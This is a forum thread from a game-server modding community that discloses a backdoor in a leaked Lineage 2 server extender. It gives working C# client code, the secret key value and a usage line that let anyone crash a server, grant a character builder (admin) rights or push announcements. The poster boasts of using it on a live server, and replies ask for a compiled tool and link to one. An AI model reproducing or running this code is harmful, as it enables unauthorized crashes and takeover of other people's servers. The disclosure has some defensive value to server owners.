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This applies specifically to THIS TOPIC.

Inside that version is a rather clever backdoor that can;

Crash the server

Set a character as builder 1 (by char name, character must be online)

Get online player count (unmultiplied)

Send announcements to the server


Code is in C#

    class KationBackdoor
       private uint nBackdoorInt;
       public KationBackdoor(uint value)
       public void SetInt(uint value)
           nBackdoorInt = value;
       public bool Crash(String ip, int port)
           return (QueryServer(1, null, ip, port) == 1);
       public bool Announce(String str, String ip, int port)
           return (QueryServer(2, str, ip, port) == 1);
       public bool SetBuilder(String name, String ip, int port)
           return (QueryServer(3, name, ip, port) == 1);
       public int GetPlayerCount(String ip, int port)
           return QueryServer(4, null, ip, port);
       private int QueryServer(int nQueryType, String strQuery, String strIP, int nPort)
           IPEndPoint ipe = new IPEndPoint(IPAddress.Parse(strIP), nPort);
           Socket serverSock = new Socket(ipe.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
               if (serverSock.Connected)
                   MemoryStream ms = new MemoryStream();
                   BinaryWriter bw = new BinaryWriter(ms);
                   bw.Write((short)0);         // holder for length
                   bw.Write((byte)0);          // protocol version opcode
                   bw.Write(nBackdoorInt);     // backdoor initializer
                   bw.Write((uint)2921549720); // unknown integer (not even needed, overwritten by server)
                   bw.Write(nQueryType);       // query type identifier
                   if (nQueryType == 2 || nQueryType == 3)
                       UnicodeEncoding enc = new UnicodeEncoding(false, false);
                       byte[] data = enc.GetBytes(strQuery);
                       bw.Write(data, 0, data.Length);
                   bw.Seek(0, SeekOrigin.Begin);
                   serverSock.Send(ms.GetBuffer(), (int)ms.Length, SocketFlags.None);

                   byte[] recvBuffer = new byte[256];
                   serverSock.Receive(recvBuffer, recvBuffer.Length, SocketFlags.None);

                   BinaryReader br = new BinaryReader(new MemoryStream(recvBuffer));
                   short len = br.ReadInt16();
                   byte op = br.ReadByte();
                   int ret = br.ReadInt32();
                   if (op != nQueryType-1)
                       MessageBox.Show(op.ToString() + " Received, NOT QUERY TYPE!");

                   return ret;
               return -2;
               if (serverSock.Connected)
               return -1;


int required for the linked version is 2711833028

i haven't checked in the cracked version shared by Vanganth, or the version(s) sold by resellers.


KationBackdoor kbd = new KationBackdoor(2711833028);
kbd.Crash("", 7777);

but do note, this backdoor no longer exists in current live versions of Vanganth's extender, though i did have some fun with L2Hydra before they updated lol


Compiled application link -> http://maxcheaters.com/forum/index.php?topic=208959


I am pretty sure, all re-sellers will ask to delete their topics :)


Just great share, waiting for compiled version


WTS vanganth's extender with backdoor CLEARED (no backdoor) ^^



How many will be able to use the class to create a simple console or win32 wrap up for use ? ;)


And shame on you for keeping this to yourself so long! BAD ANARCHY.


How many will be able to use the class to create a simple console or win32 wrap up for use ? ;)


And shame on you for keeping this to yourself so long! BAD ANARCHY.

bitch if you were ever on msn i would of told you about it, but noooo you're offline 24/7 and when you are online you ignore me :(

hope,some1 could fix this backdoor....





Change the bloody backdoor int key token to something else and it's bruteforce trial and error...

  • Vision changed the title to Kation/Vanganth leaked version backdoor (C#)

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